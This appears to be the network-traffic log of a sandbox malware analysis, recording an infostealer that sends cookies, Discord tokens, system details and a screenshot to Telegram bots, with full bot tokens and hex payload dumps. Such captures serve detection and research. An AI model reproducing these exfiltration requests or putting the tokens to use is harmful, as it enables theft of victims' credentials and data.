                                                                                        Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 54 58 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 54 65 78 61 73 22 2c 22 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 22 7a 69 70 22 3a 22 37 36 35 34 39 22 2c 22 6c 61 74 22 3a 33 31 2e 30 30 36 35 2c 22 6c 6f 6e 22 3a 2d 39 37 2e 38 34 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 22 2c 22 69 73 70 22 3a 22 51 75 61 64 72 61 4e 65 74 22 2c 22 6f 72 67 22 3a 22 4f 4d 47 49 54 53 46 41 53 54 22 2c 22 61 73 22 3a 22 41 53 38 31 30 30 20 51 75 61 64 72 61 4e 65 74 20 45 6e 74 65 72 70 72 69 73 65 73 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 22 7d
                                                                                        Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"TX","regionName":"Texas","city":"Killeen","zip":"76549","lat":31.0065,"lon":-97.8406,"timezone":"America/Chicago","isp":"QuadraNet","org":"OMGITSFAST","as":"AS8100 QuadraNet Enterprises LLC","query":"173.254.250.91"}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.449746185.199.109.1334435064C:\ProgramData\main.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:56:29 UTC108OUTGET /attationin/Cloud/main/Milinfo.txt HTTP/1.1
                                                                                        Host: raw.githubusercontent.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-06-05 01:56:29 UTC803INHTTP/1.1 404 Not Found
                                                                                        Connection: close
                                                                                        Content-Length: 14
                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-Frame-Options: deny
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        X-GitHub-Request-Id: 75CC:35BBD2:52803C:5BA726:665FC5CC
                                                                                        Accept-Ranges: bytes
                                                                                        Date: Wed, 05 Jun 2024 01:56:29 GMT
                                                                                        Via: 1.1 varnish
                                                                                        X-Served-By: cache-dfw-kdfw8210032-DFW
                                                                                        X-Cache: MISS
                                                                                        X-Cache-Hits: 0
                                                                                        X-Timer: S1717552590.719037,VS0,VE51
                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        X-Fastly-Request-ID: 28047bd42688dd2b3620861dd56f3b38dfd0a8f4
                                                                                        Expires: Wed, 05 Jun 2024 02:01:29 GMT
                                                                                        Source-Age: 0
                                                                                        2024-06-05 01:56:29 UTC14INData Raw: 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64
                                                                                        Data Ascii: 404: Not Found


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        1192.168.2.449753185.199.109.133443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:56:43 UTC108OUTGET /attationin/Cloud/main/Milinfo.txt HTTP/1.1
                                                                                        Host: raw.githubusercontent.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-06-05 01:56:43 UTC802INHTTP/1.1 404 Not Found
                                                                                        Connection: close
                                                                                        Content-Length: 14
                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-Frame-Options: deny
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        X-GitHub-Request-Id: 75CC:35BBD2:52803C:5BA726:665FC5CC
                                                                                        Accept-Ranges: bytes
                                                                                        Date: Wed, 05 Jun 2024 01:56:43 GMT
                                                                                        Via: 1.1 varnish
                                                                                        X-Served-By: cache-dfw-kdfw8210154-DFW
                                                                                        X-Cache: HIT
                                                                                        X-Cache-Hits: 1
                                                                                        X-Timer: S1717552604.840955,VS0,VE1
                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        X-Fastly-Request-ID: 4742bced582b85afb50d1846fe4da481dcf7d296
                                                                                        Expires: Wed, 05 Jun 2024 02:01:43 GMT
                                                                                        Source-Age: 14
                                                                                        2024-06-05 01:56:43 UTC14INData Raw: 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64
                                                                                        Data Ascii: 404: Not Found


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.449754149.154.167.2204437840C:\ProgramData\Microsoft\based.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:56:44 UTC266OUTPOST /bot7006262545:AAG_Oybxah5yJgAPFw9HTnZfJtepO5xBob8/sendDocument HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        Accept-Encoding: identity
                                                                                        Content-Length: 3572
                                                                                        User-Agent: python-urllib3/2.2.1
                                                                                        Content-Type: multipart/form-data; boundary=0b4ba1c968e585ef344eda942b799b23
                                                                                        2024-06-05 01:56:44 UTC3572OUTData Raw: 2d 2d 30 62 34 62 61 31 63 39 36 38 65 35 38 35 65 66 33 34 34 65 64 61 39 34 32 62 37 39 39 62 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 72 6f 6d 65 74 68 65 75 73 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 d5 0c 6b 50 21 04 00 00 01 0f 41 3e ef 3a 57 ce d5 f4 d7 95 5e 93 c0 a5 dd 9e 0a 55 e3 03 d8 1e 4e b0 24 c0 8a e2 fb 3b 7a 09 da 7f bb 98 90 7b b7 bb ad 61 b8 11 da ef 80 19 5c 8a b3 dd e1 56 99 9a 62 b4 6f 51 c9 75 db 95 a4 e5 cd e5 67 ce bb c6 de 4e bb 06 03
                                                                                        Data Ascii: --0b4ba1c968e585ef344eda942b799b23Content-Disposition: form-data; name="document"; filename="Prometheus-user.rar"Content-Type: application/octet-streamRar!kP!A>:W^UN$;z{a\VboQugN
                                                                                        2024-06-05 01:56:44 UTC389INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:56:44 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 1693
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:56:44 UTC1693INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 35 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 30 30 36 32 36 32 35 34 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 62 61 63 6b 75 70 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 62 61 63 6b 75 70 70 72 6f 6d 65 74 68 65 75 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 32 30 37 32 35 30 38 36 31 39 2c 22 74 69 74 6c 65 22 3a 22 5c 75 30 34 34 35 5c 75 30 34 34 33 5c 75 30 34 33 39 22 2c 22 74 79 70 65 22 3a 22 73 75 70 65 72 67 72 6f 75 70 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 37 35 35 32 36 30 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22
                                                                                        Data Ascii: {"ok":true,"result":{"message_id":9598,"from":{"id":7006262545,"is_bot":true,"first_name":"backupbot","username":"backupprometheusbot"},"chat":{"id":-1002072508619,"title":"\u0445\u0443\u0439","type":"supergroup"},"date":1717552604,"document":{"file_name"


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.449755149.154.167.2204437840C:\ProgramData\Microsoft\based.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:56:45 UTC266OUTPOST /bot5358754228:AAE42HAGW1bzIPxU7iVRC_96iDuHcwSjjVo/sendDocument HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        Accept-Encoding: identity
                                                                                        Content-Length: 3568
                                                                                        User-Agent: python-urllib3/2.2.1
                                                                                        Content-Type: multipart/form-data; boundary=f210e1d1e9b1545afc14bca514fed8ef
                                                                                        2024-06-05 01:56:45 UTC3568OUTData Raw: 2d 2d 66 32 31 30 65 31 64 31 65 39 62 31 35 34 35 61 66 63 31 34 62 63 61 35 31 34 66 65 64 38 65 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 72 6f 6d 65 74 68 65 75 73 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 d5 0c 6b 50 21 04 00 00 01 0f 41 3e ef 3a 57 ce d5 f4 d7 95 5e 93 c0 a5 dd 9e 0a 55 e3 03 d8 1e 4e b0 24 c0 8a e2 fb 3b 7a 09 da 7f bb 98 90 7b b7 bb ad 61 b8 11 da ef 80 19 5c 8a b3 dd e1 56 99 9a 62 b4 6f 51 c9 75 db 95 a4 e5 cd e5 67 ce bb c6 de 4e bb 06 03
                                                                                        Data Ascii: --f210e1d1e9b1545afc14bca514fed8efContent-Disposition: form-data; name="document"; filename="Prometheus-user.rar"Content-Type: application/octet-streamRar!kP!A>:W^UN$;z{a\VboQugN
                                                                                        2024-06-05 01:56:46 UTC389INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:56:46 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 1708
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:56:46 UTC1708INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 36 39 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 35 38 37 35 34 32 32 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 72 69 6f 42 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 72 69 6f 42 6c 6f 78 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 35 35 36 38 37 32 32 32 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 72 69 6f 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 42 6c 6f 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 72 69 6f 42 6c 30 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 37 35 35 32 36 30 36 2c 22 64 6f
                                                                                        Data Ascii: {"ok":true,"result":{"message_id":26910,"from":{"id":5358754228,"is_bot":true,"first_name":"MarioBot","username":"MarioBloxBot"},"chat":{"id":5556872222,"first_name":"Mario","last_name":"Blox","username":"MarioBl0x","type":"private"},"date":1717552606,"do


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        4192.168.2.449758149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:56:50 UTC388OUTPOST /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendDocument?chat_id=6024388590&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(3.27%20kb) HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary="463d8e90-76b1-4e7d-9810-9ea4ed1571fc"
                                                                                        Host: api.telegram.org
                                                                                        Content-Length: 2109
                                                                                        Expect: 100-continue
                                                                                        Connection: Keep-Alive
                                                                                        2024-06-05 01:56:51 UTC25INHTTP/1.1 100 Continue
                                                                                        2024-06-05 01:56:51 UTC40OUTData Raw: 2d 2d 34 36 33 64 38 65 39 30 2d 37 36 62 31 2d 34 65 37 64 2d 39 38 31 30 2d 39 65 61 34 65 64 31 35 37 31 66 63 0d 0a
                                                                                        Data Ascii: --463d8e90-76b1-4e7d-9810-9ea4ed1571fc
                                                                                        2024-06-05 01:56:51 UTC115OUTData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 72 6f 77 73 65 72 20 64 61 74 61 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 42 72 6f 77 73 65 72 25 32 30 64 61 74 61 2e 7a 69 70 0d 0a 0d 0a
                                                                                        Data Ascii: Content-Disposition: form-data; name=document; filename="Browser data.zip"; filename*=utf-8''Browser%20data.zip
                                                                                        2024-06-05 01:56:51 UTC1910OUTData Raw: 50 4b 03 04 14 00 00 00 08 00 18 af c4 58 3f 9e 58 b9 dc 06 00 00 11 0d 00 00 1c 00 00 00 63 6f 6f 6b 69 65 73 2f 43 68 72 6f 6d 65 20 5b 44 65 66 61 75 6c 74 5d 2e 74 78 74 c5 57 4b 8f 9b c8 1a 5d 13 29 7f 23 1b 8b 6e 8a aa a2 aa 16 bd e0 ed 07 b6 31 f8 bd 69 01 06 1b 83 c1 3c 0c b6 35 ca 6f bf b4 33 c9 24 52 6e d2 d1 2c 86 05 08 89 3a 75 be c7 39 5f f1 f1 c3 d3 3e cf f7 69 f8 14 e4 27 6e ee 2c 74 ee 99 33 64 cb d5 39 00 21 96 24 40 25 01 4a 54 02 0c 72 93 81 c6 61 00 5e 8e d4 9d 2d e6 69 9d 2d 17 38 98 ca e1 ed 5e b8 d7 15 5f f4 a7 5e e2 5c 94 be 36 33 ad b9 19 06 a1 ca b6 b8 74 ee 09 ae cb f1 c8 47 ea 65 ab be aa c6 29 20 23 a3 9d 05 ce d0 e2 0b f3 4e c7 4d 92 dc c7 db 93 9e 36 6b d9 58 59 53 7e 6e 6f 99 3d 2e 94 8d 4c e8 56 be 78 e1 39 5b 0f 9c 7e c8
                                                                                        Data Ascii: PKX?Xcookies/Chrome [Default].txtWK])#n1i<5o3$Rn,:u9_>i'n,t3d9!$@%JTra^-i-8^_^\63tGe) #NM6kXYS~no=.LVx9[~
                                                                                        2024-06-05 01:56:51 UTC44OUTData Raw: 0d 0a 2d 2d 34 36 33 64 38 65 39 30 2d 37 36 62 31 2d 34 65 37 64 2d 39 38 31 30 2d 39 65 61 34 65 64 31 35 37 31 66 63 2d 2d 0d 0a
                                                                                        Data Ascii: --463d8e90-76b1-4e7d-9810-9ea4ed1571fc--
                                                                                        2024-06-05 01:56:51 UTC929INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:56:51 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 541
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        {"ok":true,"result":{"message_id":81329,"from":{"id":6467525213,"is_bot":true,"first_name":"leglessbot2","username":"legless1bot"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":"private"},"date":1717552611,"document":{"file_name":"Browser data.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAEBPbFmX8Xjy2eMUnUjGoNLIW4U3jpQqwAC2REAAiIcAVMAAQMT1OUKSpE1BA","file_unique_id":"AgAD2REAAiIcAVM","file_size":1910},"caption":"\ud83d\udcc2 - Browser data\n\u251c\u2500\u2500 \ud83d\udcc2 - cookies(3.27 kb)"}}


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        5192.168.2.449760149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:56:52 UTC160OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%F0%9F%92%8EDiscord%20tokens:%0A HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:56:52 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:56:52 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 273
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:56:52 UTC273INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 33 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 34 36 37 35 32 35 32 31 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6c 65 67 6c 65 73 73 62 6f 74 32 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6c 65 67 6c 65 73 73 31 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 37 35 35 32 36 31 32 2c 22 74 65 78 74 22 3a 22 5c 75 64 38 33 64 5c 75 64 63 38 65
                                                                                        Data Ascii: {"ok":true,"result":{"message_id":81330,"from":{"id":6467525213,"is_bot":true,"first_name":"leglessbot2","username":"legless1bot"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":"private"},"date":1717552612,"text":"\ud83d\udc8e


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        6192.168.2.449761149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:56:53 UTC521OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%0A%F0%9F%96%A5Computer%20info:%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AComputer%20name:%20992547%0AUser%20name:%20user%0ASystem%20time:%202024-06-04%209:56:51%20pm%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20ON2Z3HY%0ARAM:%204095%20MB%0AHWID:%20E63B102745%0A%0A%F0%9F%9B%A1Security:%0AInstalled%20antivirus:%20Windows%20Defender.%0AStarted%20as%20admin:%20True HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:56:53 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:56:53 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 562
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:56:53 UTC562INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 33 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 34 36 37 35 32 35 32 31 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6c 65 67 6c 65 73 73 62 6f 74 32 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6c 65 67 6c 65 73 73 31 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 37 35 35 32 36 31 33 2c 22 74 65 78 74 22 3a 22 5c 75 64 38 33 64 5c 75 64 64 61 35
                                                                                        Data Ascii: {"ok":true,"result":{"message_id":81331,"from":{"id":6467525213,"is_bot":true,"first_name":"leglessbot2","username":"legless1bot"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":"private"},"date":1717552613,"text":"\ud83d\udda5


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        7192.168.2.449762149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:56:54 UTC293OUTPOST /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendDocument?chat_id=6024388590&caption=%F0%9F%93%B8Screenshot%20taken HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary="7e50d2cf-ee1f-4ae5-9e38-65693b30e2eb"
                                                                                        Host: api.telegram.org
                                                                                        Content-Length: 128871
                                                                                        Expect: 100-continue
                                                                                        2024-06-05 01:56:54 UTC25INHTTP/1.1 100 Continue
                                                                                        2024-06-05 01:56:54 UTC40OUTData Raw: 2d 2d 37 65 35 30 64 32 63 66 2d 65 65 31 66 2d 34 61 65 35 2d 39 65 33 38 2d 36 35 36 39 33 62 33 30 65 32 65 62 0d 0a
                                                                                        Data Ascii: --7e50d2cf-ee1f-4ae5-9e38-65693b30e2eb
                                                                                        2024-06-05 01:56:54 UTC107OUTData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 6a 70 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 6a 70 67 0d 0a 0d 0a
                                                                                        Data Ascii: Content-Disposition: form-data; name=document; filename=screenshot.jpg; filename*=utf-8''screenshot.jpg
                                                                                        2024-06-05 01:56:54 UTC16355OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1AQa"q2
                                                                                        2024-06-05 01:56:54 UTC16355OUTData Raw: 29 68 a6 31 28 a2 8a 60 14 94 b4 98 a2 e0 2e 69 c1 cf d7 eb 4c a2 98 0f 3b 1b a8 c7 d2 9a 62 53 f7 5b f3 a4 cd 14 b4 18 86 36 1d b3 f4 a6 60 8e d5 2e f2 29 77 83 f7 86 68 b0 5d 90 51 8a 9f 6a 1f 6a 69 88 ff 00 09 06 8b 31 dc 8b 14 62 9c 54 8e a2 9b de 91 41 49 4b 45 00 25 18 a2 8a 06 25 14 a6 92 80 13 8a 29 69 0d 03 12 8a 5a 4a 63 12 8a 5a 4a 00 29 3d e9 69 28 00 a4 a5 a2 81 89 41 a2 8a 63 12 92 9d 46 28 b8 5c 6d 14 b4 50 31 b4 52 9a 4a 06 84 34 52 d2 50 01 49 8a 5a 28 18 d3 46 29 69 28 b0 c2 92 94 d2 50 31 3a d2 53 a9 31 40 d0 86 93 14 bd e8 a0 04 22 93 14 b4 50 31 a4 51 4b 8a 4a 06 26 31 49 d6 9d 46 28 18 dc 62 92 9d 8a 42 28 18 df f3 d2 83 4a 45 25 03 02 29 b4 ea 4c 50 02 51 45 06 91 42 77 a4 ea 29 7a 52 75 fa 9a 06 84 23 8a 42 29 c7 f9 d2 1f d2 81 8d
                                                                                        Data Ascii: )h1(`.iL;bS[6`.)wh]Qjji1bTAIKE%%)iZJcZJ)=i(AcF(\mP1RJ4RPIZ(F)i(P1:S1@"P1QKJ&1IF(bB(JE%)LPQEBw)zRu#B)
                                                                                        2024-06-05 01:56:54 UTC16355OUTData Raw: 1b eb 9b b4 69 92 0d 3c 02 d1 c4 ac 54 b1 f9 1b 71 25 5b 8e 30 07 5e 78 2c 84 f7 56 1f 6a 11 e5 0e f2 a1 9d 15 dd 53 ef 15 42 43 30 18 39 20 1c 60 fa 1a a2 aa 6d 6f ac 2e 25 d3 e6 b9 9b 4e 93 7d a4 b0 5c 08 b8 de 5f 64 80 a3 6e 50 c4 9e 36 9f 98 8c f4 c5 1b 78 ef 63 b5 b6 6b 8b 09 1f 53 b4 86 68 2d ae 63 b8 db 12 ac 85 ce 5e 3d a7 73 29 91 f0 77 01 d3 20 e3 9f 16 55 b1 b0 9c ad 1b ea fd 3c 8f a5 8e 1f 2e a9 4a 37 9d b4 5e be 77 d3 fc ce 81 c3 c7 63 f6 d6 50 20 f2 c4 c7 f7 89 bc 46 4e 03 94 ce f0 a7 23 e6 23 1c 8f 5a 95 ad a6 86 e2 cd 6e 23 29 0c d7 b0 5a c8 cb 2c 65 a3 69 5b 00 32 e4 95 6c 67 82 32 3b 8a e5 ee 62 bb 7d 3e 42 b6 32 c7 aa c9 63 15 94 97 42 7c c4 63 4d a0 15 8f 6f 0c 55 14 13 b8 8e b8 03 3c 5e d4 27 5d 2c 7d ba 3d 3a 3f ed 4b dd 6a d6 fe 4b
                                                                                        Data Ascii: i<Tq%[0^x,VjSBC09 `mo.%N}\_dnP6xckSh-c^=s)w U<.J7^wcP FN##Zn#)Z,ei[2lg2;b}>B2cB|cMoU<^'],}=:?KjK
